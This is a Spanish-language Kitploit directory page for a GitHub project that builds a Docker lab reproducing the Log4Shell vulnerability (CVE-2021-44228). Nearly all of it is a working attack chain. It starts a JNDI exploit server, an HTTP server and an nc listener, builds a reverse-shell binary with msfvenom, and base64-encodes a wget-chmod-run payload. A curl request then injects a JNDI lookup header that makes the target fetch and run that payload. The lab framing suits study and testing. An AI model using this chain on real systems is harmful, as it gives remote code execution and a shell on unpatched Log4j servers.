Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4Shell-CVE-2021-44228-ENV — Log4Shell Entorno Docker | Kitploit
Herramientas/GitHubGitHub/ycdxsb/log4shell-cve-2021-44228-env
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubycdxsb/log4shell-cve-2021-44228-env

Log4Shell-CVE-2021-44228-ENV

Log4Shell Entorno Docker

Ver Repositorio
414hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Entorno de reproducción de Log4Shell

Descripción del ejemplo

IP de la máquina objetivo: 47.47.47.47

IP de la máquina atacante: 48.48.48.48

Ejecutar el Docker vulnerable en la máquina objetivo

  • Usar DockerFile para construir la imagen Docker y ejecutar:
root@kitploit:~
docker build . -t vuln
docker run -p 8080:8080 --name vuln vuln

Ejecutar el Docker de ataque en la máquina atacante

  • Usar DockerFile para construir la imagen Docker y ejecutar:
root@kitploit:~
docker build . -t attack
docker run -itd -p 9999:9999 -p 8888:8888 -p 1389:1389 -p 9000:9000 --name attack attack

Preparación del entorno de la máquina atacante

Ejecutar comandos en tres shells diferentes; asegúrese de que los shells estén activos

  • Iniciar el servidor JDNI en la máquina atacante
root@kitploit:~
docker exec -it attack /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 48.48.48.48 -p 8888
  • Iniciar el servidor HTTP en la máquina atacante
root@kitploit:~
docker exec -it attack /bin/bash
python3 -m http.server 9999
  • Escuchar en el puerto con nc en la máquina atacante
root@kitploit:~
docker exec -it attack /bin/bash
nc -lvvp 9000

Ejecutar el ataque en la máquina atacante

Ejecutar comandos en el mismo shell

root@kitploit:~
docker exec -it attack /bin/bash
  • Preparar el archivo de reverse shell en la máquina atacante
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=48.48.48.48 LPORT=9000 -f elf -o /rev.elf
  • Preparar el payload en la máquina atacante
root@kitploit:~
echo 'wget http://48.48.48.48:9999/rev.elf -O /tmp/rev.elf && chmod +x /tmp/rev.elf && /tmp/rev.elf' | base64
# d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==
  • Enviar el payload de ataque
root@kitploit:~
curl 47.47.47.47:8080 -H 'X-Api-Version: ${jndi:ldap://48.48.48.48:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNDguNDguNDguNDg6OTk5OS9yZXYuZWxmIC1PIC90bXAvcmV2LmVsZiAmJiBjaG1vZCAreCAvdG1wL3Jldi5lbGYgJiYgL3RtcC9yZXYuZWxmCg==}'

Generación de comandos

root@kitploit:~
python3 command_gen.py vuln_ip attack_ip

Demostración en video

Video

Referencias

  • https://github.com/christophetd/log4shell-vulnerable-app
  • https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
Descargar herramienta